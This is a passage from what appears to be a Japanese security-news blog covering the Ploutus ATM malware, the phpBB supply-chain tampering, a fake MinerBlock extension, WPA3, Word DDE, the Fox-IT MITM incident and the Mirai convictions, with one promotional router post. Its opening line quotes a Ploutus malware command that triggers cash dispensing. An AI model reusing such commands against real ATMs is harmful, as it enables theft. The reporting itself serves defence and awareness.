cmd.exe /c PLOUTOS.EXE 5449610000583686=2836957412536985
※数字はあくまで例で、実際のものとは異なる。
(SMSを使ってATMから出金する手順。Symantecより引用。)
何故SMSメッセージでエクスプロイトするのか?
SMSメッセージによるエクスプロイト機能が実装されている理由を理解する為に、ATMジャックポッティング攻撃の犯人について考える必要がある。
ATMジャックポッティング攻撃を成功させる為には、組織として犯行を計画する。
多くの場合主犯と実行犯に分かれ、実行犯はネットで募集された「雇われ人」の傾向にある。
過去のバージョンのPloutusでは、実行犯がATMの前で全ての操作を行なってATM無いからお金を奪い取る必要があった。
その為実行犯が主犯を裏切り、ATMから引き出したお金を自分の懐にいれるケースが後を絶たなかった。
そのようなリスクを減らすために実装されたのがSMSによるエクスプロイトコードの実行だ。
実行犯と主犯は電話でやり取りを行い、リアルタイムで遠隔からSMSメッセージを送信するだけでATMジャックポッティング攻撃を行えるのだ。
おまけ:ATMをまるごと盗む手法もある
メキシコではATM端末をまるごと盗んでいくような被害も発生した事がある。
日本だとこのような大胆な手口を行う犯罪は見ないが、海外ではこのような大胆な手口で犯罪を行う人もいる。
考えられる日本への影響
日本には以下の「三大大手ATMメーカー」が存在する。
この三社が日本のATM市場の90%以上のシェアを誇っている。
本記事で紹介したPloutusは、Diebold社製のATMを対象に設計されたマルウェアである。
つまり国内のDiebold社製ATMの割合が低いことから、現段階では日本全体を騒ぎにするような問題へと発展する可能性は低い。
しかしPloutus自体も日々バージョンアップを重ねており、Diebold社以外のメーカーに対して適用するようになる可能性もある。
日本のATMメーカー三社には、是非Ploutusがバージョンアップを重ねる前に対策を講じてもらいたいところだ。
推奨できるジャックポッティング攻撃の対抗策
1. ATMへの物理的なアクセスに関して
- ATM内にあるPC端末を隠すカバーに適切かつ頑丈なロックを施す。
- ATMが設置されているエリアに適切な人員配置を行う
- ATMの金庫管理業者、及び修理業者に対して適切なアクセスコントロールを施す。
2. 現金モジュールを防護する為に
- 最新のファームウェアにアップデートする事
- 以下の安全な物理認証技術を搭載する
3. その他に考えられる対策
- ATMをコントロールする端末を格納する部位(上部)の開閉のチェック
- リアルタイムでハードウェア/ソフトウェアの挙動を監視
- 通常の操作パターンとは異なった不正操作が行われていないか調査の実施
- ATM端末にインストールされたOSの最新の状態にアップデートする
Reference
- ATMから現金を奪う「ジャックポッティング」攻撃、米国に拡大(CNET)
- First ‘Jackpotting’ Attacks Hit U.S. ATMs
- New Variant of Ploutus ATM Malware Observed in the Wild in Latin America
- 018-04/0005 –Potential Jackpotting US (Update on 017-34/0002)
- Hackers target ATMs across Europe as cyber threat grows(Reuters)
- ATM makers warn of 'jackpotting' hacks on U.S. machines (Reuters)
- Texting ATMs for Cash Shows Cybercriminals’ Increasing Sophistication
- ATM・キャッシュディスペンサー業界(一目でわかる業界別市場シェア)
phpBBのダウンロードリンクが正体不明のハッカーによって書き換え。開発チームは直ちに修正。
phpBBフォーラムに掲載されているソフトウェアダウンロードリンクが、正体不明のハッカーによって書き換えられたようだ。
phpBB開発チームが、書き換えられた事実を公表した。
正体不明のハッカーが改ざんを行なったのは以下のダウンロード用リンクのようだ。
書き換えられたのは3時間
ハッカーによってURLリンクが書き換えられたのは、1月26日の12:02pm〜15:03pmの181分間だったようだ。
phpBB開発チームは、「ハッカーがどのようにリンクを書き換えたのか」という詳細は明らかにされていない。
だが開発チームは以下のようなコメントを公表したようだ。
ハッカーが侵入した入り口はサードパーティのサイトだ。phphBB.comとphpBBのソフトウェアに対して書き換え等の被害はない。
phphBBの開発チームは、書き換えられたリンクの発見次第、直ちに修復したようだ。
書き換えられていたリンクを辿ると、外部のサイトへアクセスし、悪意のコードを含んだphpBBファイルをダウンロードさせられた。
ダウンロードした悪意のあるコードを含んだphpBBのファイルを実行すると、JavaScriptコードを実行して遠隔のサーバーにアクセスするようだ。
phpBB開発チームの公表によれば、細工されたコードを含んだソフトウェアがアクセスする遠隔サーバーのドメインを取得したとされている。
つまり、現段階では万が一書き換えられたリンクを使って細工されたコード含むソフトウェアをインストールしてしまったユーザーがいたとしても、被害を食い止める事が出来るようだ。
ダウンロードしたユーザーは500人以下
書き換えられたリンクからダウンロードしたユーザーは500人以下だったようだ。
これは、phpBBの開発チームがたった3時間でダウンロードリンクの書き換えに気づいて修正したおかげと言えるだろう。
現在のリンクは安全
phpBBの開発チームによって既にリンクの修正が行われた為、現在ダウンロードページに掲載されているリンクは正式なものである。
画像
phpBB開発チームは、「もし悪意のあるコードを含んだファイルをダウンロードしてしまった場合は、インシデントレポートを出して欲しい」と注意喚起を行っているようだ。
過去にもあったダウンロードリンクの書き換え
今回のような、公式ウェブサイトのダウンロードリンクの書き換える手口は、「サプライチェーン攻撃」と呼ばれる手法である。
過去にもサプライチェーン攻撃は発生しており、以下のソフトウェア・ウェブサイトが改ざんの被害に遭った。(リンクは参考記事)
- Elmedia Player・・・ProtonRATの拡散に使用
- HandBrake・・・ProtanRATの拡散に使用
- BitTorrent・・・①KeRangerランサムウェアと②Keydnapマルウェアの拡散に使用
Appleが中国国内におけるiCloudの運営を中国企業に譲渡
Appleは、中国ユーザー向けのiCloudサービスの運営を中国企業に譲渡する事を発表した。
今後iCloudを運営することになるのは、 Guizhou on Cloud Big Data Industrial Development Co., Ltd., (以下、GCBD)という企業だ。
GCBDがあるGuizhou(貴州省)といい、中国の西南地区に位置する地域の事だ。
AppleがGCBDにiCloudにおけるデータ管理をGCBDに譲渡した背景には、中国の法律がある。
実は、中国ユーザーのデータは国内に留めなければいけないという法律があるのだ。
Appleは、貴州省内に中国のユーザーデータを保管する新たなデータセンターを建設し、その運営をGCBDに譲渡する。
現段階ではまだAppleがiCloudの運営をしているが、2018年2月28日にGCBDに譲渡される事となっている。
尚、GCBDによってiCloudが運営される事になったとしても、AppleはiCloud上のデータへのアクセス権は継続されるようだ。
Appleの発表によれば、iCloudアカウントに登録しているユーザーの居住国が「中国」と設定されているユーザーが対象だという。
しかし、中国出身で海外に在住しているユーザーの中には、本件に関する通知を受け取った者もいるようだ。
STRANGE: my US Apple ID also got the China iCloud Transfer mail... 🤨 pic.twitter.com/MZvjsbPiYL
— 王博源 Wang Boyuan (@thisboyuan) January 11, 2018
相次ぐ中国政府によるIT企業への”プレッシャー”
中国政府はこれまでにも、数多くのIT企業に対してデータを受け渡す要求をし、実際に管理下に置いてきた。
例えばQQや、WeChatといったSNSを開発・運営するTenCentも中国政府に対して同社のユーザーデータへのアクセス権を譲渡した過去がある。
中国政府はWeChatのユーザーデータを利用して、国民に電子IDを付与するプロジェクトのテストを行なったようだ。
またAppleも、2017年の7月に中国のApple StoreからVPNアプリの殆どを削除した事がある。
中国政府が、国内で運営されるVPNサービスは中国政府の認可を得ていないVPNサービスは運営出来ない事を法律で定めているからだ。
Chrome Web Storeに偽MinerBlock拡張機能。ユーザーに隠れて動画再生か
昨年から、任意のウェブサイトを訪問しているユーザーのCPUを無断で使用してMonero等の暗号通貨をマイニングする手法が横行している。
動画サイト等の滞在時間が長くなる不正にマイニングスクリプトを注入して、暗号通貨を取得する手法も見られた。
そうした背景から、最近はChromeやFirefoxのExtensionストアにマイニングスクリプトの実行をブロックするExtensionが多く見られるようになった。
MinerBlockというExtensionもその1つだ。
Chrome Web Storeを見ると、MinerBlockをダウンロードしたユーザーは約7万人に登り、非常に多くのユーザーにダウンロードされている。
しかし、セキュリティ研究者のBryan Campbell氏の指摘によれば、偽のMinerBlockが蔓延しているという。
”本物”のMinerBlockについて
本物のMinerBlockの開発者はCryptoMineDev氏である。
(本物のMinerBlockの追加画面。BleepingComputerより引用。)
本物のMinerBlockは、使用している端末がMinerBlockのデータベースに登録されているマイニングサービスへの通信をブロックする機能を持つ。
”偽物”のMinerBlockについて
一方、偽物のMinerBlockの開発者はegopastor2016と名乗る者だ。
Chome Web Srore上では、egopastor2016氏が開発したMinerBlockは既に削除されているようだが、同名で”crypto.converter”というExtensionを発見した。
ロシア語圏と関係か
下記の画像を見れば分かるが、Extensionの説明がロシア語で書かれている。
したがってegopastor2016氏は、少なくともロシア語圏となんらかの関わりを持つ事が推測される。
実際に偽物のMinerBlockの説明にもロシア語が使用されていたようだ。
(偽物のMinerBlockの追加画面。BleepingComputerより引用。)
バックグラウンドで動画再生
偽MinerBlockの抱える問題は、ユーザーの許可なしにバックグラウンドで動画を再生する事だ。
ユーザーが偽MinerBlockをダウンロードして”Enable”設定にすると、”egopastor.biz”にアクセスする。
偽MinerBlockはegopastor.bizから”タスク”のセットを受取るようだ。
受け取るセットには、どのオプションを使用して、どの動画URLにアクセスするのかが記述されているという。
以下の画像は、Fiddlerを使用で偽MinerBlockの通信の中身を分析した画面である。
(FiddlerでHTTPトラフィックを分析。BleepingComputerより引用。)
この画像では、ロシアの動画サイトにアップロードされている動画を再生している。
動画が再生されるとすぐに端末のCPU使用率が100%に到達し、動画再生が終了すると同時にCPU使用率が元に戻る。
以下は、動画を再生している時のCPU使用率を示す画像だ。
(CPU使用率が100%に跳ね上がる。BleepingComputerより引用。)
明確な目的は不明
何故バックグラウンドで動画を再生するのか、明確な目的は判明していない。
恐らく「動画の再生回数をかさ増しする為ではないか」と推測されている。
対策
既に偽のMinerBlockはChrome Web Storeからは削除されている為、本物のMinerBlockと混同する事はないだろう。
しかし、万が一Chromeに追加してしまった場合には、Chromeの拡張機能設定から削除するといい。
また、Chromeの拡張機能をダウンロードする際には、開発者の情報を見て本物かどうか確かめるようにしよう。
ICO
URL
Extensionの接続先
egopastor.biz
Reference
Wifi-Alliance®がWPA3を発表。2018年後半に詳細公開予定。
https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements
Wifi-Alliance®は、新しいWifiプロトコルWPA3の導入を発表した。
現段階で、一般に採用されているWifiプロトコルはWPA2である事から、メジャーバージョンアップが行われる事を意味する。
昨年10月にWPA2脆弱性”KRACKs”が指摘され、世界中に波紋が広がった。
参考記事:【号外】WPA2に脆弱性”Krack”が発見された?世界中のWifi機器に迫る脅威
ほぼ全ての端末がKRACKsの対象だった為、多くの人はWPA2よりセキュアなWifi通信を行えるプロトコル導入を望んでいた。
そこで今回の記事では、WPA3に関してまとめていきたい。
WPA3の詳細公表時期について
WPA3の詳細に時期は未定だが、2018年後半に詳細が公開されるようだ。
そのため、この記事では現段階で明らかになっている事のみ紹介する。
Wifi-Alliance®が公表しているWPA3に関する機能については、以下の4つが明らかになっているようだ。
- 総当たり攻撃に対するプロテクション
- 任意の端末で別端末のNW参加する際の認証を可能に
- 端末⇔ルータ間の通信を暗号化
- 鍵長を192bitへ
各項目に関して簡単に見ていこう。
ポイント①:総当たり攻撃に対するプロテクション
WPA3では”総当たり攻撃に対するセキュリティ”が向上されると言われている。
仕組みを簡単に説明すると、任意の回数だけログイン試行を失敗すると、ブロックされてしまう。
既に多くのソフトウェアやWebサイトでも実装されている機能である事から、Wifiの認証に使用されるのも当然の事と言えるだろう。
ポイント②:スマホでIoT端末のネットワーク参加を認証可能に
WPA3ではPC、スマホ、タブレット等の画面付き端末を使って、IoT端末のような画面を持たない端末のWifiネットワーク認証を行えるようになる。
この機能が実装されれば、RasberryPi等の組み込み端末でWifiネットワークを使用する際にも、わざわざ外付けディスプレイに接続して認証を行う必要もなくなる。
今後IoT端末が身の回りに増えて行くことを考慮した上で、当然実装されて然るべき機能といえるだろう。
ポイント③:端末⇔ルータ間の全通信を暗号化
WPA3のネットワークに参加している端末とルーター間の通信が、全て暗号化される。
現存するWifiネットワークには、暗号化されていない通信も存在する。
そのようなネットワークで通信を行えば、第三者が通信の中身を盗み見る事が出来るのだ。※
※勿論、HTTPS通信やVPNを使用せずに平文で通信しているケースに限る。
ポイント④:鍵長を192bitに
WPA3では、192bitの鍵長が実装される。
WPA2を使用する際にAES暗号方式を使用していれば、128/192/256の3種類から鍵長を選択する事が出来た。
WPA3ではデフォルトで鍵長が192bitになるとされている。
Vanhoef氏のコメント
WPA2のハンドシェイク方式の脆弱性”KRACKs”を指摘したVanhoef氏は、今回の発表に関して以下の様なツイートを行った。
Finally, WPA3!! It will include a more secure handshake: "WPA3 will deliver robust protections even when users choose passwords that fall short of typical complexity recommendations" https://t.co/9Ty1SrI1VB
— Mathy Vanhoef (@vanhoefm) January 8, 2018
↓翻訳↓
ついにWPA3!![WPA3には]よりセキュアなハンドシェイクが実装される予定だ。”さらにWPA3は、ユーザーが推測されやすいパスワードを使用しているケースでも安全な接続を可能にする”(以上のVanhoef氏のツイート翻訳版)
That means dictionary attacks no longer work. The handshake they're referring to is likely Simultaneous Authentication of Equals (SAE). Which is also called Dragonfly. See https://t.co/WNZnGzZTO6
— Mathy Vanhoef (@vanhoefm) January 8, 2018
↓翻訳↓
つまり、(従来の方法では)辞書攻撃ができなくなったという事だ。なお、WPA3で使用されるハンドシェイク方式は通称”Dragonfly”と呼ばれる方式だ。正式名称は”Simultaneous Authentication of Equals (SAE)”。論文のリンクはこちら
インターネットが無しでは人の成長も止まると思った話。
日本には安全な公衆Wifiが少ない
最近は日本のカフェにも無料で使えるWifiが増えてきました。
ですが、Wifi接続するのにも制限時間があったり、そもそも接続が不安定だったりしますよね。
あと最近流行りのリモートワークですが、日本に限らず世界中を見渡して、会社の外からリモート接続するビジネスマンにありがちなインシデント(事故)は以下のようなものです。
- カフェやホテルで無料Wifiに接続したが、実は攻撃者が用意した偽物のWifiスポットだった
- 会社用PCで公衆Wifiに接続し、アダルトサイトを開いて謝ってマルウェアをインストールし、ランサムウェアに感染した
この記事ではそんな疑問に応えるべく、私のお薦めするモバイルWifiルーターについて紹介します。
モバイルWifiルーターの種類
モバイルルーターには、大きく分けて2つの種類があります。
UQコミュニケーションズはKDDIの子会社にあたる通信事業者です。
「モバイルルーター」の事を「ポケットWifi」と混同して呼ぶ人がいます。
ですが厳密に言えば、「ポケットWifi」とは「ソフトバンクが提供する固有サービス名」です。
ポケットWifiは、通信速度がWiMAXと比べて速いのですが、1ヶ月7GBまでのように通信の許容量が低く、すぐに通信制限に引っ掛かってしまいます。
したがって、通信制限を気にせずインターネットを使いたい人にはあまりお薦め出来ません。
一方、WiMAXのモバイルルーターは、1ヶ月間無制限で使用する事が出来ます。
3日3GBまでと決められていて、3GBを超えた後は低速に自動的に切り替えられますが、低速状態でもYoutubeやAmazonPrimeの動画はサクサク見ることが出来ます。
ちなみに、私が使用しているのも、これから紹介するBroad WiMAXというプロバイダで契約したWiMAXです。
おすすめの2社はGMOとBroad WiMAX
WiMAXのルーターを販売している通信プロバイダーは数十社存在しています。
今回の記事では、その数ある中でも、特に優れた以下の2社を紹介したいと思います。
尚、上記の2社ともWiMAXのルーターですので、場所による通信速度に違いはありません。
GMOとくとくBB
GMOが提供しているWiMAXの強みは、キャッシュバック価格が高い事だと言えます。
メリットは”高額キャッシュバック”
GMOとくとくBBで選べるプランは以下の2つです。
- GMOとくとくBBギガ放題プラン
- 通常プラン
「GMOとくとくBBギガ放題プラン」の方は月間のデータ量制限がありません。
毎月の通信費の内訳は、まず契約時に事務手数料3,240円(税込)が発生します。
端末の発送月は日割り(3,898円 × 使った日数)で通信費が計算され、その後1ヶ月目〜2ヶ月目は毎月3,898円(税込)、3ヶ月目〜24ヶ月目は毎月4,604円(税込)かかります。
12ヶ月目で貰えるキャッシュバックの36,000円を差し引いて、実質負担額を計算すると、毎月3030円支払う事になります。
3ヶ月目以降の毎月の請求額は4,604円ですが、実質負担額でみれば3,030円になるのです。
WiMAXのモバイルWifiルーターの中では契約期間に支払う通信費は最安値になるので、値段を重視するならGMOとくとくBBが一番お薦めです。
キャッシュバックの申請に一苦労
ひとつだけ「GMOとくとくBB」の”注意点”を挙げると、キャッシュバックを受け取るプロセスが”非常に面倒くさい”ところです。
キャッシュバックを受け取るためには、GMOとくとくBBから送られてくるお知らせメールに記載されているURLからアクセスし、キャッシュバック受取用の口座を入力する必要があります。
入力すると、翌月末日(営業日)に指定した口座に振り込まれます。
しかし、キャッシュバックの詳細が記載されているメールの送信者が、契約してから日常的にプロモーションメールを送信する送信者と同じなんです。
もし迷惑メール送信者として指定してしまえば、キャッシュバックの詳細を記載したメールも迷惑メールフォルダに行ってしまいます。
ですのでGMOとくとくBBで契約するのであれば、携帯のリマインダーをセットして、期間が近づいたらGMOから送られてくるメールを注意して見ておきましょう。
GMOとくとくBBのまとめ
- キャッシュバックを貰えば3ヶ月以降の実質負担額が3,030円
- キャッシュバックの受取りプロセスが面倒くさい
毎月の支払いを抑えるならBroad WiMAX
Broad WiMAXは、GMOとくとくBBのような高額キャッシュバックが無い代わりに、毎月の支払い額が他社と比べて安くなります。
ちなみに私が使用しているのもBroad WiMAXです。
1年半以上使ってみて思うBroad WiMAXの良さは以下の2つ。
- 毎月の支払い額を抑える事が出来る事
- 乗り換えの違約金を負担してくれる事
それぞれ見ていきましょう。
毎月の支払い額が安い
毎月の通信費の内訳は、まず契約時に事務手数料3,240円(税込)が発生。
端末の発送月は日割り(2944円 × 使った日数)で通信費が計算され、その後1ヶ月目〜2ヶ月目は毎月2,944円(税込)、3ヶ月目〜24ヶ月目は毎月3,683円(税込)かかります。
GMOとくとくBBでは毎月の支払いが4,604円(税込)なので、Broad WiMAXでは約1,000円ほど毎月の支払い額が抑えられるのです。
違約金を負担してくれる
もし他社のWiMAXを既に使っているのに、モバイルルーターに不具合があったり、契約しているサービスに納得がいかない等の悩みを抱えてる事はありませんか。
そういう時に気になるのが、2年/3年縛りの違約金だと思います。
ですが、Broad WiMAXに乗り換えれば他社のWiMAXから乗り換える時に発生する違約金(※上限19,000円)を負担するキャンペーンを期間無制限で行なっています。
したがって、契約更新月じゃなくても解約して最新の端末を使いたいなら、Broad WiMAXをお薦めします。
まとめ
- 毎月の支払い額を抑える事ができる
- 乗り換えの違約金を負担してくれる
マイクロソフトがWordのDDE機能をデフォルトでDisableに。月例パッチで自動適用。
マイクロソフトは12月の月例パッチを公開し、WordのDDE機能をデフォルトで”Disable”設定に変更。
DDE機能とは
DDEはDynamic Data Exchangeの略で、Officeの機能の1つ。
DDEを使用する事で、あるOfficeのファイルが別のOfficeファイルのデータを動的に取得する事が出来る。
例えばExcelで編集したテーブルををWordで参照したとしよう。
DDEは動的にデータを取得する事が出来るため、元ファイルであるExcelのテーブルデータに変更があった場合も、Wordファイルに変更が反映される。
既にマイクロソフトはDDEの上位互換としてObject Linkingという機能を実装したが、DDEは今もなおOffce製品に実装されている。
DDE機能を悪用してマルウェア拡散
2017年10月、SensePostのセキュリティ研究者は、DDEを悪用してマルウェア拡散する手順を公開した。
ハッカー集団のFIN7は、SensePostの手順公開から僅かな時間でその手法を起用。金融機関に対して早速攻撃を仕掛けた。
FIN7とは、金融機関に対してサイバー攻撃を仕掛けたり、マルウェアの拡散者として知られるハッカー集団である。
この時点ではマイクロソフトはDDEをOffice製品の脆弱性として見なしていなかった。
マイクロソフトがDDEを悪用したサイバー攻撃を「セキュリティを侵す機能」として扱わなかったのは、Office製品がファイルを開く際に「確認メッセージ」を表示する事が理由だった。
マイクロソフトにとって、DDEを悪用したエクスプロイトは、あくまで「(攻撃者が)公式の機能を悪用した”クリエイティブな手法”として捉えていたと言える。
12月の月例パッチDDEをデフォルトで”Disable”に
10月のFIN7によるエクスプロイトを皮切りに、DDEを悪用した手法が拡散され、DDEを悪用したエクスプロイトが行われるようになった。
10月半ばにはマイクロソフトは徐々に考え方を改め始め、SecurityAdvisory 4053440にはDDE機能を”Disable”にする方法を記載した。
そして1ヶ月強が経った今週の火曜日に、マイクロソフトはWordのDDE機能をデフォルトでDisableする決断を下した。
このアップデートを適用すると、Windowsシステムにレジストリキーを追記され、WordのDDEがデフォルトで”Disable”される。
ユーザーがDDE機能を必要とする場合は?
万が一、ユーザーがWordにDDE機能を必要としている場合は以下の選択肢がある。
GUIで設定変更したい場合は、Security Advisory 4053440を参照してもらいたい。
以下には、「1.レジストリキーを編集する」の手順を記載しておく。
- レジストリエディタを開く
- \HKEY_CURRENT_USER\Software\Microsoft\Office\version\Word\Security AllowDDE(DWORD)を表示
- DWORDの値を希望に沿って変更する。
| AllowDDE(DWORD) = 0 | DDE機能を”Disable”にする。※12月の月例パッチを行えばデフォルト設定されている |
| AllowDDE(DWORD) = 1 | 既に実行しているプログラムのみDDE機能を”Enable”する。それ以外の.exeプログラムの起動を伴うDDEリクエストは破棄される |
| AllowDDE(DWORD) = 2 | 完全にDDE機能を”Enable”にする |
既にサポートアウトしているWord 2003や2007に対してもパッチを提供している事から、マイクロソフトの本気度が伺えるだろう。
Fox−ITが中間者攻撃の被害に。迅速な対応で10時間以内に鎮火。
オランダに拠点を置くセキュリティ企業、Fox ITでインシデントが発生した事が明らかになった。
Fox−ITは世界中の大企業に対してManaged Security Services、Threat Intelligenceを行っているセキュリティ企業である。
この記事は以下のように構成され、それぞれ順番に説明していく。
- 中間者攻撃とは
- 攻撃者の狙い
- インシデントのタイムライン
中間者攻撃とは
FoX ITを攻撃したハッカーが使用した手法は、中間者攻撃 であるとされている。
中間者攻撃とは、通信を行う2人の間に割り込み、両者がやりとりする通信を気づかれないように自分の物とすり替える攻撃手法である。
中間者攻撃を行う事で、攻撃者はターゲットの通信を盗聴する事が出来る。
中間者攻撃は、英語のMan-In-The−Middle Attackを意訳したもので、英語のメディアでは良くMITM(又は、MTM)と略されている。
以降この記事では、MITMとして表記する。
攻撃者はFox−ITの顧客用ポータルサイトに攻撃
攻撃者は、Fox−ITの顧客が使用するポータルサイト”ClientPortal”に対してのみ攻撃を行なった。
Fox−ITによれば、攻撃者の狙いは以下の情報だったという。
- ユーザーがClientPortalへログインする際に入力する認証情報(ID&Passwords)
- 顧客がClientPortalへ送信するファイル
攻撃者は合計で9のユーザーの認証情報を盗み出し、12個のファイルを盗聴した。
Fox−ITはMITMの被害に遭っている事実を、最初の攻撃から僅か5時間で突き止め、直ちに二段階認証サービスを”Disable”に変更した。
その結果、MITMの被害規模をかなり抑えることが出来た。
更に、Fox−ITが認証情報を漏洩された顧客に対して迅速に認証情報のリセットを行った事や、幸い盗聴されたファイルが機密文書ファイルでなかった事も、被害を抑えた事の理由と言える。
文書ファイルの他にも、ユーザーの携帯電話番号が盗聴されたとされているが、重要ではないとされている。
Fox−ITによるIRのタイムライン
以下はFox−ITがインシデントを検知してから対処するまでのタイムラインである。
非常に短期間で迅速な然るべき対応をした事が見て取れる。
| 2017年9月16日 | 攻撃者と思われるReconnaissanceが確認された一番最初の日。攻撃者はFox-ITのネットワークに対してポートスキャンや脆弱性スキャン等、Reconnaissanceフェーズで一般的なスキャンを行なった。 |
| 2017年9月19日, 00:38 | 攻撃者は、fox-it.comのDNSレコードを変更。サードパーティのプロバイダーを通して行われた。 |
| 2017年9月19日, 02:02 | clientportal.fox-it.comが本物のFox-ITのClientPortalサーバーを指していたと確認できる最後の時間。この時点まではClientPortalへのトラフィックは盗聴されていなかった事がわかる。 |
| 2017年9月19日, 02:05-02:15 | 最大10分間、攻撃者が一時的にFox-ITのEメールをリルートしていた。この10分間のリルートはMITMではなく、攻撃者がFox−ITのトラフィックの間に入り、SSL証明書を偽装できている事を確かめる為のテストだったと思われる。 |
| 2017年9月19日, 02:21 | 実際のMITM攻撃が発生。この時点で、偽装SSL証明書がClientPortal上に用意され、clientportal.fox-it.comのDNSレコードは海外のVPNプロバイダが所有するサーバーを指していた。 |
| 2017年9月19日, 07:25 | Fox−ITは、ドメイン”fox-it.com”が認証なしにリダイレクトされていた事を突き止めた。Fox−ITは、DNSの設定を元のネームサーバーに戻し、ドメインレジスターのパスワードを変更。DNSがキャッシュされていた事から変更が反映されるまでに少々時間を要した。 |
| 2017年9月19日, 12:45 | Fox-ITは、ClientPortalへログインする際に必要な二段階認証(SMS)を”Disable”した。こうする事で、ClientPortalのユーザーに対するMITMを防ぐ事が出来た。この時Fox-ITが一連の作業中、ClientPortalの運営を通常通り継続したが、それは攻撃者にFox-ITが攻撃を受けている事実に気づいている事を悟られないためである。この時点で、ClientPortalに対するMITMは継続されていた。しかし、ユーザーが二段階認証へアクセス出来なかった為、リダイレクト先のサーバーへトラフィックが流れる事はなかった。 |
| 2017年9月19日−20日 | Fox−ITは、インシデントに関する徹底的な調査を開始。MITMの被害を受けている最中に通信の盗聴をされた全顧客に対して通知を出した。更に、オランダのデータ保護機関に対しても通報を行なった。同日、警察による調査が開始され現在も継続している。Fox−ITのこれまでの調査で、MITMを引き起こした攻撃者の狙いを突き止めた。また、Fox-ITのインシデントレスポンスは充分に行われ、二段階認証も再度機能し始めた。 |
| 2017年9月20日, 15:38 | ClientPortalは適切に機能している。Fox−ITはインシデントの調査を継続している。 |
Miraiの作成者JhaとWhiteに有罪判決。世界中に数々のDDoS攻撃を引き起こしたMiraiに一旦終止符。
(この記事は、Brian Krebs氏のブログ記事”Mirai IoT Botnet Co-Authors Plead Guilty”を基に作成しました。逐語翻訳ではなく、若干内容を補足しております。)
アメリカの司法省は今週火曜日、2名の男に対して有罪判決を言い渡した。
その2人の男が犯した罪は『Mirai』の作成である。
Miraiはインターネット上に存在する脆弱なIoT端末をスキャンし、ボットネットの一員に加える。
ターゲットとするIoT端末の例としては、監視カメラやデジタルビデオレコーダー等のインターネットに接続された端末。
脆弱なIoT端末を支配下に加える事で、これまで多くのターゲットに対してDDoS攻撃を仕掛ける。
Miraiの作成者は”21歳と20歳”の青年たち
今回アメリカの司法省に有罪判決を言い渡されたのは、
の二人。
Krebs氏の記事にJhaのプロフィール画像が掲載されていたので転載する。
JhaとWhiteはProtraf Solutions LLCという会社の共同創始者。
Protraf Solutions LLCは、DDoS攻撃の被害に遭っている企業に対して、DDoS攻撃を鎮静するサービスを提供する企業である。
JhaとWhiteは、自分達が引き起こしたDDoS攻撃の被害に遭っている企業に対してDDoS攻撃を止めるサービスを提供していたのだ。
まるで、自分で起こした火事を消す消防士の様である。
クリック詐欺にも手を出す
JhaとWhiteは、クリック詐欺をしていた事も明らかになった。
クリック報酬型広告は、広告をみたユーザーがクリックした分だけ広告料が発生する広告である。
Miraiボットネットを使えば、任意の広告を大量にクリックさせる事が可能になる。
オンライン広告を専門に調査を進めるAdlooxの報告によれば、2017年だけでも全米で160億ドルの損害金が発生したとされている。
#訂正: 初稿ではワンクリック詐欺という表現になっておりましたが、正しくはクリック詐欺(PPC広告のクリック数水増し)でした。
共犯者とMiraiの拡大
実はクリック詐欺には、もう一人の共犯者がいた。
Dalton Norman(21歳、メテーリー、ルイジアナ州)である。
JhaとWhiteは、Normanと共に
を行い、報酬として金銭を受け取ったとされている。
彼らはボットネットを使って、アフィリエイトリンクを含むメールが大量に送りつけたのだ。
拡散されたメールには巧妙な細工がされており、被害者の端末上では公式のサイトにアクセスしているように見えたという。
検察官の調査では、以上の手口を使ってNorman個人で30BTCを稼いだ。
更にNormanは、自身が発見したIoT端末の脆弱性をJha達に告げ、Miraiを30万台のボットを擁する巨大なボットネットに成長する事に加担した。
Jha達がクリック詐欺の犯行で手に入れた金額は200BTCで、2017年の1月29日時点の金額ではおよそ$180,000となる。
KrebsOnSecurityへ”未曾有のDDoS攻撃”
一番初めに確認されたMiraiボットネットによるDDoS攻撃は、2016年9月に発生した。
セキュリティ研究者であるBrian Krebs氏のサイト”KrebsOnSecurity”がDDoS攻撃の被害に遭ったのだ。
この時は、175,000台ものIoT端末からの攻撃だったという。
通信容量は620Gbps超。
その規模は、Akamaiがこれまでに経験した最高容量の、およそ2倍の規模の攻撃であったとされている(Usenixのホワイトペーパー参照)。
この攻撃はAkamaiの他の顧客に対しても影響を及ぼし、Akamaiは一時的にKrebsOnSecurityをネットワークから除外したほどだった。
GoogleのProject Shieldによって復旧
Googleは、Project ShieldでKrebsOnSecurityに対して救済措置を行なった。
Project Shieldは、「ネット上の人権や言論の自由を守る」ために、ジャーナリスト、反政府組織・個人等のウェブサイトをDDoS攻撃から守るプロジェクトである。
Miraiボットネットのソースコード公開
Anna Senpaiというハンドルネームを名乗る人物が、Miraiボットネットのソースコードを公開。
公開されたのは2016年の9月、KrebsOnSecurityに対する攻撃が終了したほんの数日後だったとされる。
Dyn社へのDDoS攻撃が発生
ソースコードの公開によってMiraiボットネットは拡大を続けた。
ソースコードを取得した他のハッカー達がMiraiの亜種を作成して各所へDDoS攻撃を仕掛けたのだ。
その中で代表的なDDoS攻撃として、Dyn社への攻撃が挙げられる。
2017年10月21日、何者かがISPのDyn社に対してDDoS攻撃を引き起こした。
Dyn社は、Twitter、Netflix、SoundCloud、Spotify、Reddit等の有名なIT企業に対してサービスを提供しているISPである。
DDoS攻撃が行われた事により、攻撃の最中は上記のサービスに対するアクセスが出来ない状況になっていた。
以下の画像は、MiraiがDynのネットワークに及ぼしたDDoS攻撃の被害を示す地図。
全米に広がっていた事が見て取れる。
ドイツやイギリスへも飛び火
Miraiによる被害は、イギリスやドイツのISP、金融機関に対しても広がっていった。
Krebs氏は2017年7月、イギリスのISP、金融機関に対してDDoS攻撃を行なったMiraiボットネットに関しても記事を書いている。
その記事では、Daniel Kayeという人物が犯人である証拠を報告していた。(Kayeは、Bestbuyというハンドルネームを使っていた。)
Kayeはドイツの通信会社であるドイツ・テレコム社に対しても攻撃を引き起こし、何百万を超える顧客がインターネットに接続出来なくなった。
現在Kayeは、犯行に対して有罪判決を言い渡され、イギリスで服役している。
MinecraftサーバーへDDoS攻撃を実施
Krebs氏の調査によれば、JhaとWhiteはMinecraftをホストしているサーバーに対して攻撃した。
Minecraftをホストするサーバーは、フランス系のサーバーホスティングサービスであるOVHが管理している。
この時のDDoS攻撃は、KrebsOnSecurityに対する攻撃よりも遥かに大きいDDoS攻撃だったようだ。
Rutgers大学へのDDoS攻撃
翌年の2017年1月にKrebs氏が行なった調査では、Rutgers大学に対するDDoS攻撃も、”同一人物による犯行”である証拠が示された。
実はJhaは、同年にRutgers大学の学士課程にコンピュータ・サイエンス専攻で入学していた。
